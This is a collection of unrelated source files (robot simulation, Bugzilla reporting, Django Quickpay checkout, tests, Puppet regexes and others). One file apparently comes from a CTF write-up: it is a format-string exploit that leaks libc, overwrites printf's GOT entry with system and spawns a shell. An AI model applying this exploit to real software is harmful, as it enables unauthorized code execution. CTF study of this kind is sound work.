if self.controller is not None:
self.controller.reset()
#* Reset Actuators
for actuator in self.actuators.values():
if hasattr(actuator, 'reset'):
actuator.reset()
#* Reset Sensors
for sensor in self.sensors.values():
if hasattr(sensor, 'reset'):
sensor.reset()
@property
def food(self):
"""Getter for the food attribute. It is a boolean attribute active if the robot stores food.
"""
return self._food
@food.setter
def food(self, hasfood):
"""Setter for the food attribute. It is a boolean attribute active if the robot stores food.
"""
self._food = hasfood
@property
def bounding_box(self):
return Point(self.pos[0], self.pos[1]).buffer(self.radius).boundary
def intersect(self, g):
inters = self.bounding_box.intersection(g)
if not inters: return []
if isinstance(inters, Point):
return np.array(inters.coords)
else:
return [np.array(v.coords[0]) for v in inters.geoms]
def initialize_render(self, canvas):
x, y = tuple(self.pos)
contour_id = canvas.create_oval(x-self.radius-2, y-self.radius-2,\
x + self.radius+2, y + self.radius+2, fill=self.color2)
# body_id = canvas.create_oval(x-self.radius, y-self.radius,\
# x + self.radius, y + self.radius, fill=self.color)
bodyA_id = canvas.create_arc(x-self.radius, y-self.radius,\
x + self.radius, y + self.radius, start=np.degrees(self.theta), extent=180, fill="black")
bodyB_id = canvas.create_arc(x-self.radius, y-self.radius,\
x + self.radius, y + self.radius, start=np.degrees(self.theta)+180, extent=180, fill="black")
orient_id = canvas.create_line(x, y,\
x + self.radius * 2 * np.cos(self.theta),\
y + self.radius * 2 * np.sin(self.theta),\
fill='black', width=2)
self.render_dict = {
'contour' : contour_id,
'bodyA' : bodyA_id,
'bodyB' : bodyB_id,
'orient' : orient_id,
}
return canvas
def render(self, canvas):
"""
Renders the robot in a 2D tkinter canvas.
"""
x, y = tuple(self.pos)
canvas.coords(self.render_dict['contour'],\
x-self.radius, y-self.radius,\
x + self.radius, y + self.radius)
canvas.coords(self.render_dict['bodyA'],\
x-self.radius+3, y-self.radius+3,\
x + self.radius-3, y + self.radius-3)
canvas.coords(self.render_dict['bodyB'],\
x-self.radius+3, y-self.radius+3,\
x + self.radius-3, y + self.radius-3)
canvas.itemconfig(self.render_dict['contour'], fill=self.color2)
canvas.itemconfig(self.render_dict['bodyA'], start=0, extent=180, fill=self.colorA)
canvas.itemconfig(self.render_dict['bodyB'], start=180, extent=180, fill=self.colorB)
canvas.coords(self.render_dict['orient'], x, y,\
x + self.radius * 2 * np.cos(self.theta),\
y + self.radius * 2 * np.sin(self.theta))
return canvas | 3.046875 | 3 |
util/flask_learn.py | yt7589/aqp | 0 | 12796791 | <filename>util/flask_learn.py
from flask import Flask
class FlaskLearn(object):
def __init__(self):
self.name = 'FlaskLearn'
def startup(self):
print('Flask学习程序')
def hello_world(self):
app = Flask('HelloWorld')
| 2.953125 | 3 |
scripts/sprint_report.py | AndrewDVXI/kitsune | 929 | 12796792 | <gh_stars>100-1000
#!/usr/bin/env python
import logging
import sys
import textwrap
import xmlrpc.client
USAGE = 'Usage: sprint_report.py <SPRINT>'
HEADER = 'sprint_report.py: your friendly report view of the sprint!'
# Note: Most of the bugzila api code comes from Scrumbugz.
cache = {}
log = logging.getLogger(__name__)
BZ_URL = 'http://bugzilla.mozilla.org/xmlrpc.cgi'
SESSION_COOKIES_CACHE_KEY = 'bugzilla-session-cookies'
BZ_RESOLUTIONS = ['', 'FIXED', 'INVALID', 'WONTFIX', 'DUPLICATE',
'WORKSFORME', 'DUPLICATE']
BZ_FIELDS = [
'id',
'status',
'resolution',
'summary',
'whiteboard',
'assigned_to',
'priority',
'severity',
'product',
'component',
'blocks',
'depends_on',
'creation_time',
'last_change_time',
'target_milestone',
]
UNWANTED_COMPONENT_FIELDS = [
'sort_key',
'is_active',
'default_qa_contact',
'default_assigned_to',
'description'
]
class SessionTransport(xmlrpc.client.SafeTransport):
"""
XML-RPC HTTPS transport that stores auth cookies in the cache.
"""
_session_cookies = None
@property
def session_cookies(self):
if self._session_cookies is None:
cookie = cache.get(SESSION_COOKIES_CACHE_KEY)
if cookie:
self._session_cookies = cookie
return self._session_cookies
def parse_response(self, response):
cookies = self.get_cookies(response)
if cookies:
self._session_cookies = cookies
cache.set(SESSION_COOKIES_CACHE_KEY,
self._session_cookies, 0)
log.debug('Got cookie: %s', self._session_cookies)
return xmlrpc.client.Transport.parse_response(self, response)
def send_host(self, connection, host):
cookies = self.session_cookies
if cookies:
for cookie in cookies:
connection.putheader('Cookie', cookie)
log.debug('Sent cookie: %s', cookie)
return xmlrpc.client.Transport.send_host(self, connection, host)
def get_cookies(self, response):
cookie_headers = None
if hasattr(response, 'msg'):
cookies = response.msg.getheaders('set-cookie')
if cookies:
log.debug('Full cookies: %s', cookies)
cookie_headers = [c.split(';', 1)[0] for c in cookies]
return cookie_headers
class BugzillaAPI(xmlrpc.client.ServerProxy):
def get_bug_ids(self, **kwargs):
"""Return list of ids of bugs from a search."""
kwargs.update({
'include_fields': ['id'],
})
log.debug('Searching bugs with kwargs: %s', kwargs)
bugs = self.Bug.search(kwargs)
return [bug['id'] for bug in bugs.get('bugs', [])]
def get_bugs(self, **kwargs):
get_history = kwargs.pop('history', True)
get_comments = kwargs.pop('comments', True)
kwargs.update({
'include_fields': BZ_FIELDS,
})
if 'ids' in kwargs:
kwargs['permissive'] = True
log.debug('Getting bugs with kwargs: %s', kwargs)
bugs = self.Bug.get(kwargs)
else:
if 'whiteboard' not in kwargs:
kwargs['whiteboard'] = ['u=', 'c=', 'p=']
log.debug('Searching bugs with kwargs: %s', kwargs)
bugs = self.Bug.search(kwargs)
bug_ids = [bug['id'] for bug in bugs.get('bugs', [])]
if not bug_ids:
return bugs
# mix in history and comments
history = comments = {}
if get_history:
history = self.get_history(bug_ids)
if get_comments:
comments = self.get_comments(bug_ids)
for bug in bugs['bugs']:
bug['history'] = history.get(bug['id'], [])
bug['comments'] = comments.get(bug['id'], {}).get('comments', [])
bug['comments_count'] = len(comments.get(bug['id'], {})
.get('comments', []))
return bugs
def get_history(self, bug_ids):
log.debug('Getting history for bugs: %s', bug_ids)
try:
history = self.Bug.history({'ids': bug_ids}).get('bugs')
except xmlrpc.client.Fault:
log.exception('Problem getting history for bug ids: %s', bug_ids)
return {}
return dict((h['id'], h['history']) for h in history)
def get_comments(self, bug_ids):
log.debug('Getting comments for bugs: %s', bug_ids)
try:
comments = self.Bug.comments({
'ids': bug_ids,
'include_fields': ['id', 'creator', 'time', 'text'],
}).get('bugs')
except xmlrpc.client.Fault:
log.exception('Problem getting comments for bug ids: %s', bug_ids)
return {}
return dict((int(bid), cids) for bid, cids in comments.items())
def wrap(text, indent=' '):
text = text.split('\n\n')
text = [textwrap.fill(part, expand_tabs=True, initial_indent=indent,
subsequent_indent=indent)
for part in text]
return '\n\n'.join(text)
def sprint_stats(bugs):
"""Print bugs stats block."""
# Return dict of bugs stats
#
# * total points
# * breakdown of points by component
# * breakdown of points by focus
# * breakdown of points by priority
# * other things?
def parse_whiteboard(whiteboard):
bits = {
'u': '',
'c': '',
'p': '',
's': ''
}
for part in whiteboard.split(' '):
part = part.split('=')
if len(part) != 2:
continue
if part[0] in bits:
bits[part[0]] = part[1]
return bits
def get_history(bugs, sprint):
history = []
for bug in bugs:
for item in bug.get('history', []):
for change in item.get('changes', []):
added = parse_whiteboard(change['added'])
removed = parse_whiteboard(change['removed'])
if ((change['field_name'] == 'status_whiteboard'
and removed['s'] != sprint
and added['s'] == sprint)):
history.append((
item['when'],
bug,
item['who'],
removed['s'],
added['s']
))
return history
def sprint_timeline(bugs, sprint):
"""Print timeline block."""
timeline = []
history = get_history(bugs, sprint)
# Try to associate the change that added the sprint to the
# whiteboard with a comment.
for when, bug, who, removed, added in history:
reason = 'NO COMMENT'
for comment in bug.get('comments', []):
if comment['time'] == when and comment['creator'] == who:
reason = comment['text']
break
timeline.append((
when,
bug['id'],
who,
removed,
added,
reason
))
timeline.sort(key=lambda item: item[0])
for mem in timeline:
print('%s: %s: %s' % (mem[0], mem[1], mem[2]))
print(' %s -> %s' % (mem[3] if mem[3] else 'unassigned', mem[4]))
print(wrap(mem[5]))
print('')
def print_header(text):
print(text)
print('=' * len(text))
print('')
def main(argv):
# logging.basicConfig(level=logging.DEBUG)
if not argv:
print(USAGE)
print('Error: Must specify the sprint to report on. e.g. 2012.19')
return 1
sprint = argv[0]
print(HEADER)
print('')
print('Working on %s' % sprint)
print('')
bugzilla = BugzillaAPI(
BZ_URL,
transport=SessionTransport(use_datetime=True),
allow_none=True)
bugs = bugzilla.get_bugs(
product=['support.mozilla.org'],
whiteboard=['s=' + sprint],
resolution=BZ_RESOLUTIONS,
history=True,
comments=True)
bugs = bugs['bugs']
print_header('Timeline')
sprint_timeline(bugs, sprint)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| 2.171875 | 2 |
flickpyper/pickles.py | theodysseus/flickpyper | 1 | 12796793 | <reponame>theodysseus/flickpyper<gh_stars>1-10
from os import path
import pickle
def get_ids(file):
if path.isfile(file):
with open(file, 'rb') as f:
return pickle.load(f)
else:
return []
def put_ids(file, ids):
with open(file, 'wb') as f:
pickle.dump(ids, f)
| 2.640625 | 3 |
new_trade/main.py | cbbing/stock | 31 | 12796794 | #coding: utf-8
import tushare as ts
import pandas as pd
from util.date_convert import GetNowDate
def diagnosis_one_stock(code):
"""
个股诊断
:return:
"""
# 获取股价
df = get_stock_price(code, True)
# 均线指标
# K线提示
def get_stock_price(code, include_realtime_price):
"""
获取个股股价
:param code: 股票代码
:param include_realtime_price: 是否含实时股价
:return:
"""
# 获取历史股价
df = ts.get_hist_data(code)
df = df[['close']]
df['date'] = df.index
if include_realtime_price:
df_today = ts.get_today_all()
df_code = df_today[df_today['code']==code]
df_code = df_code[['trade']]
df_code['date'] = GetNowDate()
df_code.rename(columns={'trade': 'close'}, inplace=True)
df = pd.concat([df, df_code], ignore_index=True)
df.sort(columns='date', inplace=True)
df = df.drop_duplicates(['date'])
df.index = range(len(df))
print '\n'
# print df.head()
print df.tail()
return df
if __name__ == "__main__":
get_stock_price('600000', True)
| 2.671875 | 3 |
tests/unit/test_fields/test_base.py | radeklat/sparkql | 0 | 12796795 | <reponame>radeklat/sparkql
import pytest
from sparkql.exceptions import FieldParentError, FieldNameError
from sparkql import Float, Struct
class TestBaseField:
@staticmethod
def should_give_correct_info_string():
# given
float_field = Float()
# when
info_str = float_field._info()
# then
assert (
info_str
== "<Float\n spark type = FloatType\n nullable = True\n name = None <- [None, None]\n parent = None\n>"
)
@staticmethod
def should_reject_setting_a_set_parent():
# given
struct = Struct()
float_field = Float()._replace_parent(struct)
another_struct = Struct()
# when, then
with pytest.raises(FieldParentError):
float_field._replace_parent(another_struct)
@staticmethod
def should_get_contextual_field_name():
# given
float_field = Float()
float_field._set_contextual_name("contextual_name")
# when
contextual_name = float_field._contextual_name
# then
assert contextual_name == "contextual_name"
@staticmethod
def should_reject_overriding_a_set_contextual_name():
# given
float_field = Float()
float_field._set_contextual_name("contextual_name")
# when, then
with pytest.raises(FieldNameError):
float_field._set_contextual_name("another_name")
@staticmethod
def test_field_name_should_raise_error_if_not_resolved():
# given
float_field = Float()
# when, then
with pytest.raises(FieldNameError):
float_field._field_name
@staticmethod
def test_should_reject_replacing_a_preexisting_explicit_name():
# given
float_field = Float(name="explicit_name")
# wheb, then
with pytest.raises(FieldNameError):
float_field._replace_explicit_name("new_explicit_name")
| 2.34375 | 2 |
Gathered CTF writeups/ptr-yudai-writeups/2019/Security_Fest_2019/Baby3/solve.py | mihaid-b/CyberSakura | 1 | 12796796 | <reponame>mihaid-b/CyberSakura
from ptrlib import *
libc = ELF("./libc.so.6")
elf = ELF("./baby3")
sock = Process("./baby3")
delta = 0xe7
# Stage 1: exit-->_start
payload = fsb(
pos = 6,
writes = {elf.got("exit"): elf.symbol("_start") & 0xffff},
bs = 2,
size = 2,
bits = 64
)
print(payload)
sock.recvuntil("input: ")
sock.sendline(payload)
# Stage 2: leak libc base
sock.recvuntil("input: ")
sock.sendline("%25$p")
addr_libc_start_main = int(sock.recvline(), 16)
libc_base = addr_libc_start_main - libc.symbol("__libc_start_main") - delta
logger.info("libc base = " + hex(libc_base))
# Stage 3: printf-->system
payload = fsb(
pos = 6,
writes = {elf.got("printf"): libc_base + libc.symbol("system")},
bs = 2,
size = 8,
bits = 64
)
sock.recvuntil("input: ")
sock.sendline(payload)
# Stage 4: get the shell!
sock.sendline("/bin/sh\x00")
sock.interactive()
| 1.914063 | 2 |
vaultier/libs/version/context.py | dz0ny/Vaultier | 30 | 12796797 | <reponame>dz0ny/Vaultier
class Manager(object):
_user = None
_enabled = True
_user_required = True
def set_user_required(self, user_required):
self._user_required = user_required
def get_user_required(self):
return self._user_required
def set_user(self, user):
self._user = user
def get_user(self):
if self._user_required and (not self._user or
self._user.is_anonymous()):
msg = 'To store version valid user is required on ' \
'version_context_manager'
raise Exception(msg)
return self._user
def set_enabled(self, enabled):
self._enabled = enabled
def get_enabled(self):
return self._enabled
version_context_manager = Manager()
class VersionContextAwareApiViewMixin(object):
def initialize_request(self, request, *args, **kargs):
request = super(VersionContextAwareApiViewMixin, self) \
.initialize_request(request, *args, **kargs)
version_context_manager.set_user(request.user)
return request
| 2.4375 | 2 |
app/chat/migrations/0002_alter_chatmessage_user_id.py | GonnaFlyMethod/simple_chat | 0 | 12796798 | # Generated by Django 3.2.5 on 2021-07-20 13:39
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('chat', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='chatmessage',
name='user_id',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='sender'),
),
]
| 1.53125 | 2 |
SourceModel/SM_Constants.py | crossminer/CrossPuppeteer | 47 | 12796799 | CLASS_REGEX = r'class [\w\d\:\-_\']+(?:\:\:[\w\d\:\-_\']+)*\s*(?:\(.+\)\s*)*{*'
CLASS_NAME_REGEX = r'class ([\w\d\:\-_\']+(?:\:\:[\w\d\:\-_\']+)*)\s*(?:\(.+\)\s*)*{*'
DEFINE_REGEX = r'define \w+(?:\:\:\w+)*\s*(?:\(.+\)\s*)*{*'
FILE_REGEX = r'file\W*\{\W*\'.+\'\W*:|file\W*\{\W*\".+\"\W*:|file\W*{\W*\$.+\W*:'
PACKAGE_REGEX = r'package\W*\{\W*\'.+\'\W*:|package\W*\{\W*\".+\"\W*:|package\W*{\W*\$.+\W*:'
SERVICE_REGEX = r'service\W*\{\W*\'.+\'\W*:|service\W*\{\W*\".+\"\W*:|service\W*{\W*\$.+\W*:'
DECLARE_INCLUDE_REGEX = r'(?:^|\n)\s*(?:include|require|contain) (?:Class)*\[*(?:\$|\')*[\w\d\:\-_\']+(?:\:\:\${0,1}[\w\d\:\-_\']+)*\'*\]*(?:\s*,\s*(?:Class)*\[*(?:\$|\')*[\w\d\:\-_\']+(?:\:\:\${0,1}[\w\d\:\-_\']+)*\'*\]*)*'
#DECLARE_INCLUDE_REGEX = r'(?:^|\n)\s*(?:include|require|contain) (?:Class)?\[?((?:\'|\$)?[\w\d\:\-_]+(?:\:\:[\w\d\:\-_]+)*\'?)\]?(?:\s*,\s*(?:Class)?\[?((?:\'|\$)?[\w\d\:\-_]+(?:\:\:[\w\d\:\-_]+)*\'?)\]?)*'
#DECLARE_RESOURCE_REGEX = r'(?:^|\n)\s*class \{\s*(?:\'|\"|\$)?[\w\:\-_]+(?:\:\:\$?[\w\:\-_]+)*(?:\'|\")?\s*\:'
DECLARE_RESOURCE_REGEX = r'(?:^|\n)\s*class \{\s*(?:\'|\")?\:{0,2}(\$?[\w\d\:\-_]+(?:\:\:\$?[\w\d\:\-_]+)*)(?:\'|\")?\s*\:'
EXEC_REGEX = r'exec\W*\{\W*\'.+\'\W*:|exec\W*\{\W*\".+\"\W*:|exec\W*{\W*\$.+\W*:'
LOC_REGEX = r'\n'
IF_REGEX = r'if\W+.+\W*\{'
CASE_REGEX = r'case\W+.+\W*\{'
USER_REGEX = r'user\W*\{\W*.+:'
COMMENT_REGEX = r'\A#|\n#'
HARDCODED_VALUE_REGEX = r'= \d+|=> \d+|= .*\'.+?\s*(?:\(.+\)\s*)*\'|=> .*\'.+?\s*(?:\(.+\)\s*)*\'|' \
r'= .*\".+?\s*(?:\(.+\)\s*)*\"|=> .*\".+\s*(?:\(.+\)\s*)*\"'
NODE_REGEX = r'node\W*\w+(?:\:\:\w+)*\W+\{'
GLOBAL_VAR_REGEX = r'\$.+\W*='
CLASS_GROUP_REGEX = r'class (\w+(?:\:\:\w+)*)\s*(?:\(.+\)\s*)*{*'
CLASS_INH_REGEX = r'inherits (\w+(?:\:\:\w+)*){*'
FILE_GROUP_REGEX = r'file\W*\{\W*\'(.+)\'\W*:|file\W*\{\W*\"(.+)\"\W*:|file\W*{\W*(\$.+)\W*:'
PACKAGE_GROUP_REGEX = r'package\W*\{\W*\'(.+)\'\W*:|package\W*\{\W*\"(.+)\"\W*:|package\W*{\W*(\$.+)\W*:'
SERVICE_GROUP_REGEX = r'service\W*\{\W*\'(.+)\'\W*:|service\W*\{\W*\"(.+)\"\W*:|service\W*{\W*(\$.+)\W*:'
DEPENDENT_PACKAGE = r'Package\W*\[\'.+\'\]'
DEPENDENT_SERVICE = r'Service\W*\[\'.+\'\]'
DEPENDENT_FILE = r'File\W*\[\'.+\'\]'
DEPENDENT_CLASS = r'Class\W*\[\'.+\'\]'
DEPENDENT_GROUP_PACKAGE = r'Package\W*\[\'(.+)\'\]'
DEPENDENT_GROUP_SERVICE = r'Service\W*\[\'(.+)\'\]'
DEPENDENT_GROUP_FILE = r'File\W*\[\'(.+)\'\]'
DEPENDENT_GROUP_CLASS = r'Class\W*\[\'(.+)\'\]'
PACKAGE = "Package"
FILE = "File"
SERVICE = "Service"
CLASS = "Class"
VAR1_REGEX = r'\$\{.+\}'
VAR2_REGEX = r'\$.+\W*\{'
VAR3_REGEX = r'\'.+\''
VAR4_REGEX = r'\".+\"'
VAR1_EX_REGEX = r'\$\{(.+)\}'
VAR2_EX_REGEX = r'\$(.+)\W*\{'
VAR3_EX_REGEX = r'\'(.+)\''
VAR4_EX_REGEX = r'\"(.+)\"'
#class\W+.+\{|
| 2.4375 | 2 |
views.py | jfroejk/cartridge_quickpay | 0 | 12796800 | <reponame>jfroejk/cartridge_quickpay<gh_stars>0
from django.http import HttpRequest, HttpResponse, HttpResponseRedirect, JsonResponse, \
HttpResponseBadRequest, HttpResponseForbidden
from django.template import loader
from django.template.response import TemplateResponse
from django.shortcuts import redirect, render
from django.utils.timezone import now
from django.views.decorators.csrf import csrf_exempt
from django.core.urlresolvers import reverse
from django.db import transaction
from mezzanine.conf import settings
from mezzanine.utils.importing import import_dotted_path
from cartridge.shop import checkout
from cartridge.shop.models import Order
from cartridge.shop.forms import OrderForm
import json
import logging
import re
from urllib.parse import urlencode
from typing import Callable, List, Optional
from .payment import get_quickpay_link, sign, sign_order, start_subscription, capture_subscription_order, \
acquirer_requires_popup, acquirer_supports_subscriptions, order_currency
from .models import QuickpayPayment, get_private_key
handler = lambda s: import_dotted_path(s) if s else lambda *args: None
billship_handler = handler(settings.SHOP_HANDLER_BILLING_SHIPPING)
tax_handler = handler(settings.SHOP_HANDLER_TAX)
order_handler = handler(settings.SHOP_HANDLER_ORDER)
order_form_class = (lambda s: import_dotted_path(s) if s else OrderForm)(getattr(settings, 'QUICKPAY_ORDER_FORM', None))
def quickpay_checkout(request: HttpRequest) -> HttpResponse:
"""Checkout using Quickpay payment form.
Use the normal cartridge.views.checkout_steps for GET and for the rest other payments steps,
use this special version for POSTing paument form for Quickpay.
Settings:
QUICKPAY_ORDER_FORM = dotted path to order form to use
QUICKPAY_FRAMED_MODE = <whether to use framed Quickpay>
QUICKPAY_SHOP_BASE_URL: str required = URL of the shop for success, cancel and callback URLs
QUICKPAY_ACQUIRER: str|list required = The acquirer(s) to use, e.g. 'clearhaus'
QUICKPAY_AUTO_CAPTURE: bool default False = Whether to auto-capture payment
urls.py setup:
from cartridge_quickpay.views import checkout_quickpay, order_form_class
...
url("^shop/checkout/", checkout_steps, {'form_class': order_form_class}),
url("^shop/checkout_quickpay/", checkout_quickpay, name="checkout_quickpay"),
url("^shop/", include("cartridge.shop.urls")),
...
** FOR FRAMED MODE: **
Change checkout.html
- <form ... onsubmit="return false">
- Change submit button to:
- <button class="btn btn-lg btn-primary pull-right" onclick="checkout_quickpay();">Go to payment</button>
- add payment modal
<div class="modal db-modal fade" id="payment_window" tabindex="-1" role="dialog" aria-labelledby="payment_window_label">
<div class="modal-dialog" role="document">
<div class="modal-content">
<div class="modal-body">
<iframe id="payment_iframe" style="width: 100%; border: none; height: 90vh;"></iframe>
</div>
</div>
</div>
</div>
- and add JS at the bottom:
<script>
function checkout_quickpay() {
$.post("{% url 'quickpay_checkout' %}", $('.checkout-form').serialize(), function(data) {
if (data.success) {
$('#payment_iframe').attr('src', data.payment_link);
$('#payment_window').modal('show');
} else {
alert("failed");
}
});
}
</script>
"""
framed: bool = getattr(settings, 'QUICKPAY_FRAMED_MODE', False)
acquirer = request.POST.get('acquirer', None)
logging.debug("quickpay_checkout: using acquirer {}".format(acquirer or '<any>'))
in_popup = acquirer_requires_popup(acquirer)
step = checkout.CHECKOUT_STEP_FIRST # Was: _LAST
checkout_errors = []
initial = checkout.initial_order_data(request, order_form_class)
logging.debug("quickpay_checkout: initial order data = {}".format(initial))
form = order_form_class(request, step, initial=initial, data=request.POST)
if form.is_valid():
logging.debug("quickpay_checkout() - Form valid")
request.session["order"] = dict(form.cleaned_data)
try:
billship_handler(request, form)
tax_handler(request, form)
except checkout.CheckoutError as e:
logging.warn("quickpay_checkout() - billship or tax handler failed")
checkout_errors.append(e)
# Create order and Quickpay payment, redirect to Quickpay/Mobilepay form
order = form.save(commit=False)
order.setup(request) # Order is saved here so it gets an ID
# Handle subscription or one-time order
if (hasattr(order, 'has_subscription')
and order.has_subscription()
and acquirer_supports_subscriptions(acquirer)):
quickpay_subs_id, quickpay_link = start_subscription(
order, order.items.all().order_by('id')[0])
logging.debug("quickpay_checkout() - starting subscription {}, payment link {}"
.format(quickpay_subs_id, quickpay_link))
else:
# One-time order OR subscription with acquirer that doesn't support subscriptions
quickpay_link: str = get_quickpay_link(order, acquirer)['url']
logging.debug("quickpay_checkout() - product purchase (or subscription w/o auto-renewal), payment link {}"
.format(quickpay_link))
# Redirect to Quickpay
if framed:
logging.debug("quickpay_checkout() - JSON response {}"
.format(str({'success': True, 'payment_link': quickpay_link})))
return JsonResponse({'success': True, 'payment_link': quickpay_link})
# Medsende om url skal åbnes i nyt vindue, åben i JS, håndtere at returside havner i iframe igen
elif in_popup:
logging.debug("quickpay_checkout() - Opening popup window")
return render(request, "cartridge_quickpay/payment_toplevel.html", {'quickpay_link': quickpay_link})
else:
logging.debug("quickpay_checkout() - Redirect response")
return HttpResponseRedirect(redirect_to=quickpay_link)
# Form invalid, go back to checkout step
step_vars = checkout.CHECKOUT_STEPS[step - 1]
template = "shop/%s.html" % step_vars["template"]
context = {"CHECKOUT_STEP_FIRST": step == checkout.CHECKOUT_STEP_FIRST,
"CHECKOUT_STEP_LAST": step == checkout.CHECKOUT_STEP_LAST,
"CHECKOUT_STEP_PAYMENT": (settings.SHOP_PAYMENT_STEP_ENABLED and
step == checkout.CHECKOUT_STEP_PAYMENT),
"step_title": step_vars["title"], "step_url": step_vars["url"],
"steps": checkout.CHECKOUT_STEPS, "step": step, "form": form,
"payment_url": "https://payment.quickpay.net/d7ad25ea15154ef4bdffb5bf78f623fc"}
page = loader.get_template(template).render(context=context, request=request)
if framed:
logging.debug("quickpay_checkout() - Form not OK, JSON response")
return JsonResponse({'success': False, 'page': page})
else:
logging.debug("quickpay_checkout() - Form not OK, page response")
return HttpResponse(page)
def escape_frame(f: Callable[[HttpRequest], HttpResponse]) -> Callable[[HttpRequest], HttpResponse]:
"""Escape iframe when payment is in a iframe and the shop itself is not"""
def f_escape(request: HttpRequest) -> HttpResponse:
if request.GET.get('framed'):
logging.debug("cartridge_quickpay.views.escape_frame: Escaping")
url = request.path
get_args = request.GET.copy()
get_args.pop('framed')
if get_args:
url += '?' + get_args.urlencode()
res = '<html><head><script>window.parent.location.replace("{}");</script></head></html>'.format(url)
return HttpResponse(res)
else:
logging.debug("cartridge_quickpay.views.escape_frame: NOT in frame")
return f(request)
f_escape.__name__ = f.__name__
return f_escape
def escape_popup(f: Callable[[HttpRequest], HttpResponse]) -> Callable[[HttpRequest], HttpResponse]:
"""Escape payment popup window"""
def f_escape(request: HttpRequest) -> HttpResponse:
if request.GET.get('popup'):
logging.debug("cartridge_quickpay.views.escape_popup: Escaping")
url = request.path
get_args = request.GET.copy()
get_args.pop('popup')
if get_args:
url += '?' + get_args.urlencode()
res = '<html><head><script>var opener = window.opener; opener.document.location = "{}"; window.close(); opener.focus();</script></head></html>'.format(url)
return HttpResponse(res)
else:
logging.debug("cartridge_quickpay.views.escape_popup: NOT in popup")
return f(request)
f_escape.__name__ = f.__name__
return f_escape
@escape_frame
@escape_popup
def failed(request: HttpRequest):
"""Payment failed"""
logging.warning("payment_quickpay.views.failed(), GET args = {}".format(request.GET))
qp_failed_url = getattr(settings, 'QUICKPAY_FAILED_URL', '')
if qp_failed_url:
return HttpResponseRedirect(qp_failed_url)
else:
# Assumes the template is available...
return render(request, "shop/quickpay_failed.html")
@escape_frame
@escape_popup
def success(request: HttpRequest) -> HttpResponse:
"""Quickpay payment succeeded.
GET args:
id : int = ID of order
hash : str = signature hash of order. Raise
NB: Form not available (quickpay order handler)
NB: Only safe to call more than once if order_handler is
"""
order_id = request.GET.get('id')
if order_id:
order = Order.objects.get(pk=order_id)
else:
order = Order.objects.from_request(request) # Raises DoesNotExist if order not found
order_hash = sign_order(order)
logging.debug("\n ---- payment_quickpay.views.success()\n\norder = %s, sign arg = %s, check sign = %s"
% (order, request.GET.get('hash'), sign_order(order)))
logging.debug("data: {}".format(dict(request.GET)))
# Check hash.
if request.GET.get('hash') != order_hash:
logging.warn("cartridge_quickpay:success - hash doesn't match order")
return HttpResponseForbidden()
# Call order handler
order_handler(request, order_form=None, order=order)
response = redirect("shop_complete")
return response
try:
from cartridge_subscription.models import Subscription, SubscriptionPeriod
except ImportError:
Subscription = None
@csrf_exempt
@transaction.atomic
def callback(request: HttpRequest) -> HttpResponse:
"""Callback from Quickpay. Register payment status in case it wasn't registered already"""
def update_payment() -> Optional[QuickpayPayment]:
"""Update QuickPay payment from Quickpay result"""
# Refers order, data from outer scope
payment: Optional[QuickpayPayment] = QuickpayPayment.get_order_payment(order)
if payment is not None:
payment.update_from_res(data) # NB: qp.test_mode == data['test_mode']
payment.save()
return payment
data = json.loads(request.body.decode('utf-8'))
logging.debug("\n ---- payment_quickpay.views.callback() ----")
logging.debug("Got data {}\n".format(data))
# We may get several callbacks with states "new", "pending", or "processed"
# We're only interested in "processed" for payments and "active" for new subscriptions
qp_state = data.get('state', None)
if (qp_state in ('processed', 'active', 'rejected')
or not getattr(settings, 'QUICKPAY_AUTO_CAPTURE', False) and qp_state == 'pending'):
logging.debug("payment_quickpay.views.callback(): QP state is {}, processing".format(qp_state))
else:
logging.debug("payment_quickpay.views.callback(): QP state is {}, skipping".format(qp_state))
return HttpResponse("OK")
# Get the order
order_id_payment_id_string = data.get('order_id','')
logging.debug('order_id_payment_id_string: {}'.format(order_id_payment_id_string))
order_id = re.sub('_\d+', '', order_id_payment_id_string)
logging.debug('order_id: {}'.format(order_id))
try:
order = Order.objects.filter(pk=order_id).select_for_update()[0] # Lock order to prevent race condition
except IndexError:
# Order not found, ignore
logging.warning("payment_quickpay.views.callback(): order id {} not found, skipping".format(order_id))
return HttpResponse("OK")
# Check checksum. If we have multiple agreements, we need the order currency to get the right one
checksum = sign(request.body, get_private_key(order_currency(order)))
logging.debug("Request checksum = {}".format(request.META['HTTP_QUICKPAY_CHECKSUM_SHA256']))
logging.debug("Calculated checksum = {}".format(checksum))
if checksum != request.META['HTTP_QUICKPAY_CHECKSUM_SHA256']:
logging.error('Quickpay callback: checksum failed {}'.format(data))
return HttpResponseBadRequest()
logging.debug("payment_quickpay.views.callback(): order.status = {}".format(order.status))
if data['state'] == 'rejected':
update_payment()
elif data['type'] == 'Subscription' and Subscription is not None:
# Starting a NEW subscription. The Subscription is created in order_handler
logging.error("payment_quickpay.views.callback(): starting subscription, order {}".format(order.id))
# Capture the initial subscription payment
capture_subscription_order(order) # Starts async capture, next callback is 'accepted'
elif data['accepted']:
# Normal or subscription payment
# If autocapture, the payment will have been captured.
# If not autocapture, the payment will have been reserved only and must be captured later.
# -- The order can be considered paid (reserved or captured) if and only if we get here.
# -- An order is paid if and only if it has a transaction_id
logging.info("payment_quickpay.views.callback(): accepted payment, order {}".format(order.id))
payment = update_payment()
order.transaction_id = data['id']
logging.debug("payment_quickpay.views.callback(): calling order_handler, qp subscription = {}"
.format(data.get('subscription_id', '-')))
order_handler(request=None, order_form=None, order=order, payment=payment)
logging.debug("payment_quickpay.views.callback(): final order.status: {}".format(order.status))
return HttpResponse("OK")
| 2 | 2 |
python/archive/writedata.py | d-giles/KeplerML | 0 | 12796801 | # reads in both both .sav files: the long-cadence data and the variable supplement
# removes all objects that lack data like effective temperatures
# writes the dataset.npy and logdata.npy files
# also building the training and test sets and runs a Gaussian Naive Bayes classifier
import numpy as np
import pyfits as pf
import itertools
from scipy.io.idl import readsav
from scipy.spatial import distance
import pylab as pl
from sklearn import metrics
from sklearn.ensemble import RandomForestClassifier
from sklearn.mixture import GMM
from astroML.datasets import fetch_sdss_specgals
from astroML.decorators import pickle_results
from sklearn import naive_bayes
#from __future__ import print_function
s = readsav('../data/grndsts9_vars.sav')
s2 = readsav('../data/ts_stats.sav')
